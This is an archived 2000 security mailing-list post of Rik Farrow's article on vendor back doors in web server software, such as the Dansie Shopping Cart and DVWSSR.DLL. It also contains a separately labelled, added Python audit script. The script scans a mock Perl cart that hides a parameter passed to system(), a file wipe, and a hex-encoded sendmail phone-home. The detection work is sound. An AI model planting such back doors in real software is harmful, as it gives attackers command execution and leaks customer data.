Information Security News mailing list archives
Close The Door
From: William Knowles <wk () C4I ORG>
Date: Fri, 11 Aug 2000 04:38:10 -0500
*********************************************************************

Back Door Mania
by Rik Farrow

The first two weeks in April 2000 brought with them a bit of spring fever in the form of hype and media confusion over two back doors in Web server software. In each case, the back doors were put there deliberately by the vendors, although it was not their intention that either would be used for malicious purposes.

Back doors have an illustrious history, with perhaps the most famous example being the code engineered by Ken Thompson. Thompson could log into any Unix system as any user by entering a magic password. The code for the back door was not in any source file: it lived in the compiler binary, which recognized when it was building the login program and inserted the trojan, and recognized when it was building itself and re-inserted that logic, so the back door survived a rebuild from clean source. That made it almost impossible to discover what he had done. Thompson carefully explained his cleverness in his Turing Award lecture, published in 1984 as "Reflections on Trusting Trust."

Others have included back doors in their code. Eric Allman put back doors in the sendmail program, but the source code has always been available, making it relatively easy to uncover and remove them. AT&T field engineers used a bug in the Unix expreserve program to get root access while working on customers' systems.

The most recent furor is over code included in Web server software. The first hint of trouble appeared on a newsgroup devoted to Perl programming for CGI (Common Gateway Interface) scripts. Kasey Johns was checking over some code his company had licensed, looking for security problems. The code in question was version 3.0.4 of the Dansie Shopping Cart. Johns reported that it was not easy to check this Perl script, as it had been compressed from 7,000 lines into only 250 by removing newline characters. In the script, Johns discovered code that had been deliberately obscured by encrypting the command, the email address, and the subject line. The code sent email to tech () dansie net whenever the cart software was used.
Another section of code accepted commands from a hidden form variable; it changed the permissions on a data file required by the program and then overwrote it. Through these mechanisms Dansie received notification whenever someone began using the code, and could remotely delete a file, disabling the script. According to emails from Dansie representatives to the Bugtraq mailing list, these mechanisms were used only as defenses against software pirates. But another posting to Bugtraq pointed out that the value associated with the hidden variable was not checked at all, permitting anyone who knew about it to execute arbitrary commands on the Web server. Dansie responded by removing the offending code in the next release, which was made available almost immediately, and by providing a patch for existing releases.

Another issue became an overnight sensation largely because of the words used as the encryption key: "Netscape engineers are weenies!" Rain Forest Puppy, or rfp, posted his second advisory of the year, explaining that DVWSSR.DLL, installed either with Option Pack 4 or with the Microsoft FrontPage extensions, permitted reading any file on the Web server. Rfp noted that the filename must first be encrypted with that key, and that only users who had access to DVWSSR.DLL, generally administrators and those who manage several virtual hosts on the same Web server, could take advantage of this back door.

CORE SDI explored the same DLL and discovered that it was possible to overflow a buffer by sending it a value of at least 5,000 characters, causing IIS to stop functioning (a denial of service). Again, the attacker would have to have access to the DLL for this to work. Someone would have had to change the access control list protecting the DLL to open up the vulnerability to remote attackers (or a remote attacker would have needed an administrator's password).
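The pattern Johns found in the Dansie cart, a request parameter handed to the shell and strings hidden behind an encoding so that a grep will not find them, is the kind of thing a quick static pass over licensed code can surface before it goes on a server. The following is an added example, not code from the article, from Dansie, or from any vendor: a small Python audit script run over a constructed mock-up of a flattened shopping-cart CGI script. The mock-up, the parameter-access and call patterns it looks for, and the use of pack("H*", ...) as the obfuscation are assumptions for illustration; the real cart's code is not reproduced here.

```python
"""Static audit of a Perl CGI script for back-door indicators (added example).

The script scanned below is a constructed mock-up of the pattern described in
the article (a hidden parameter handed to the shell, a data file chmod'ed and
overwritten, a hex-packed mail command and address), not real vendor code.
"""
import re
from dataclasses import dataclass

# A 7,000-line script flattened into 250 lines averages ~28 statements per line;
# anything much over 200 characters on one line deserves a second look.
LONG_LINE = 200

# How Perl CGI scripts usually read request parameters (cgi-lib.pl's %in, CGI.pm's param()).
PARAM_RE = re.compile(r"\$(?:in|FORM|form|query)\{|\bparam\s*\(")
# Calls that reach the shell or change the filesystem (backticks and pipe-opens included).
DANGEROUS_RE = re.compile(r'\b(?:system|exec|unlink|chmod|rename)\b|`|\bopen\s*\([^,]+,\s*"\|')
# pack("H*", "...") turns a hex blob back into text; it hides strings from a plain grep.
HEX_PACK_RE = re.compile(r'pack\s*\(\s*"H\*"\s*,\s*"([0-9a-fA-F]+)"\s*\)')
MAIL_RE = re.compile(r"sendmail|Net::SMTP|MIME::Lite", re.IGNORECASE)


@dataclass
class Finding:
    line: int
    kind: str    # compressed-source | obfuscated-string | phone-home | param-to-shell-or-fs
    detail: str


def split_statements(line):
    """Split one line of Perl on ';' outside single or double quotes (heuristic, no escapes)."""
    stmts, cur, quote = [], [], None
    for ch in line:
        if quote:
            cur.append(ch)
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
            cur.append(ch)
        elif ch == ";":
            stmts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    if "".join(cur).strip():
        stmts.append("".join(cur))
    return stmts


def decode_hex_literals(line):
    """Return the plaintext of every pack("H*", "...") literal on the line."""
    return [bytes.fromhex(h).decode("latin-1")
            for h in HEX_PACK_RE.findall(line) if len(h) % 2 == 0]


def audit(source):
    """Scan Perl source text and return a list of Finding records, in line order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if len(line) > LONG_LINE:
            findings.append(Finding(lineno, "compressed-source", f"{len(line)} characters on one line"))
        decoded = decode_hex_literals(line)
        for text in decoded:
            findings.append(Finding(lineno, "obfuscated-string", text))
        # Check for mail over the line plus its decoded literals, so a sendmail
        # path that only exists after decoding is still caught.
        m = MAIL_RE.search(line + " " + " ".join(decoded))
        if m:
            findings.append(Finding(lineno, "phone-home", m.group(0)))
        # A request parameter and a shell/filesystem call in the same statement.
        for stmt in split_statements(line):
            if PARAM_RE.search(stmt) and DANGEROUS_RE.search(stmt):
                findings.append(Finding(lineno, "param-to-shell-or-fs", stmt.strip()))
    return findings


# Constructed mock-up of a flattened cart script (not real vendor code). Line 2 is ordinary
# cart logic plus a hex-hidden "phone home"; line 3 is the hidden-variable back door.
MOCK_CART_PL = r'''#!/usr/bin/perl
require "cgi-lib.pl";&ReadParse(*in);$data="cart.dat";$total=0;foreach $item (split(/,/,$in{'items'})){($sku,$qty)=split(/:/,$item);$total+=$price{$sku}*$qty;}open(MAIL,"|".pack("H*","2f7573722f7362696e2f73656e646d61696c202d74"));print MAIL "To: ".pack("H*","74656368406578616d706c652e636f6d")."\nSubject: cart installed\n\n$ENV{'SERVER_NAME'}\n";close(MAIL);
if($in{'vid'}){chmod 0666,$data;open(F,">$data");close(F);system("$in{'vid'}");}print "Content-type: text/html\n\nTotal: $total\n";
'''

if __name__ == "__main__":
    for f in audit(MOCK_CART_PL):
        print(f"line {f.line}: {f.kind}: {f.detail}")
```

The checks are deliberately statement-level heuristics: the legitimate use of $in{'items'} on line 2 is not flagged, while the chmod and system calls fed by $in{'vid'} on line 3 are. The open(F,">$data") between them is missed because the controlling condition sits in the previous statement, so treat a hit as a place to read the surrounding block, not as the whole story. Decoding only handles the hex form used in the mock-up; other encodings need their own decoder. And once something like this is found, the fix is the one Dansie shipped, removing the code, not validating the parameter.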
Unfortunately, the press went wild with the DVWSSR.DLL story, leading to some interesting self-contradictory remarks in the media. Microsoft put out several versions of security bulletin MS00-025, with a final suggestion that the offending DLL simply be removed.

Including sneaky back doors in software may be appealing to programmers, but it is a certain way to stir up customer unrest when they are discovered. If you are running a Web server, I suggest you remove any software that you do not need on the server, shut down any network services that are not absolutely necessary, and use proper permissions and ownership on all files and directories. Web servers make attractive targets. Back doors, whether intentional or not, make them even more tempting. Shut your doors.

Resources

Creating a basic padded cell: A tutorial with sample scripts
http://www.sunworld.com/swol-01-1999/swol-01-security.html

Web server wiles, Part one: Secure your Solaris Web server from the perils of the Void
http://www.sunworld.com/sunworldonline/swol-04-1996/swol-04-security.html

Securing your Web server: Stop the wrong people from accessing your site! Make sure your site is secure from prying eyes and malicious intent
http://www.sunworld.com/sunworldonline/swol-06-1996/swol-06-webmaster.html

************************************************************************

About the author
----------------
Rik provides UNIX and Internet security consulting and training. He has been working with UNIX system security since 1984, and with TCP/IP networks since 1988. He has taught for the IRS, Department of Justice, NSA, US West, Royal Canadian Mounted Police, Swedish Navy, and for many US and European user groups. Farrow also consults with firms in the design and implementation of security applications.
*********************************************************************

CUSTOMER SERVICE

You can subscribe or unsubscribe to any of your e-mail newsletters by updating your form at:
http://www.itworld.com/cgi-bin/w3-msql/newsletters/subcontent12.html?

For subscription changes that cannot be handled via the web, please send an email to our customer service dept: support () itworld com

*********************************************************************
http://www.itworld.com

ISN is hosted by SecurityFocus.com
---
To unsubscribe email LISTSERV () SecurityFocus com with a message body of "SIGNOFF ISN".